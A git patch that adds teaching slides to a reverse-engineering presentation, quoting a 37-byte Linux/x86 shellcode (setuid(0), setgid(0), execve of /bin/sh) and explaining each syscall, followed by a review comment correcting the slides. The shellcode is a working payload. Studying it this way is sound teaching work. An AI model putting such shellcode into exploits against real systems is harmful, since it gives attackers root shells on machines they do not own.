From 14d3e81177b765cfad13db7a907187a351d903da Mon Sep 17 00:00:00 2001
From: Ward Wouts
Date: Wed, 15 Feb 2023 12:04:05 +0100
Subject: [PATCH] short shellcode explainer added

---
 index.html | 93 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 93 insertions(+)

diff --git a/index.html b/index.html
index 31f0d45..d2979cc 100644
--- a/index.html
+++ b/index.html
@@ -503,6 +503,99 @@ Many improvements exist to make gdb nicer for reverse engineering, such as: - https://github.com/longld/peda ] +--- +template: inverse +# Shellcode explained +--- +.left-column[ +## Shellcode explained +] +.right-column[ +Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html +``` +/* + * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) + * - 37 bytes - xgc@gotfault.net + */ + + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 + + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 + + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80" // int $0x80 +``` +] + +--- +.left-column[ +## Shellcode explained +] +.right-column[ +``` + "\x6a\x17" // push $0x17 + "\x58" // pop %eax + "\x31\xdb" // xor %ebx, %ebx + "\xcd\x80" // int $0x80 +``` +`int 0x80` is a legacy way of doing a syscall to the kernel. See also: +http://www.linfo.org/int_0x80.html As this is a 32-bit program, the list of syscalls can be found here: `/usr/include/asm/unistd_32.h` Which shows the values in decimal: 0x17 = 23 = setuid. +So, whats done here is put 0x17 in EAX, and make EBX (the argument for setgid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using a XOR. Then call int 0x80. Resulting in a `setuid 0`. +] + +--- +.left-column[ +## Shellcode explained +] +.right-column[ +``` + "\x6a\x2e" // push $0x2e + "\x58" // pop %eax + "\x53" // push %ebx + "\xcd\x80" // int $0x80 +``` +Pretty much the same as last snippet, but for 0x2e = 46 = setgid. 
+] + +--- +.left-column[ +## Shellcode explained +] +.right-column[ +``` + "\x31\xd2" // xor %edx, %edx + "\x6a\x0b" // push $0xb + "\x58" // pop %eax + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp, %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp, %ecx + "\xcd\x80" // int $0x80 +``` +Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to make things align on 32-bit words. + +The arguments for execve will not fit in registers, as they're variable size, so EBX gets a pointer to the string. +] + +
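Review bot: the second "Shellcode explained" slide says EBX is "the argument for setgid", but the snippet it explains loads 0x17 = 23 = setuid into EAX; setgid is the next slide's snippet (0x2e = 46). Suggest "make EBX (the argument for setuid, ...) 0 using a XOR", and "whats" should be "what's". On the last slide, the explanation of execve's arguments stops at EBX, while the code visibly sets up all three registers: the first `push %edx` after `xor %edx, %edx` pushes the NUL that terminates the string, `mov %esp, %ebx` points EBX at "/bin//sh", and the following `push %edx` / `push %ebx` / `mov %esp, %ecx` builds the argv array ["/bin//sh", NULL] with ECX pointing at it, leaving EDX (still zero) as envp = NULL. One sentence on ECX and EDX would make that slide match the header comment execve("/bin/sh", ["/bin/sh", NULL]) quoted on the first slide.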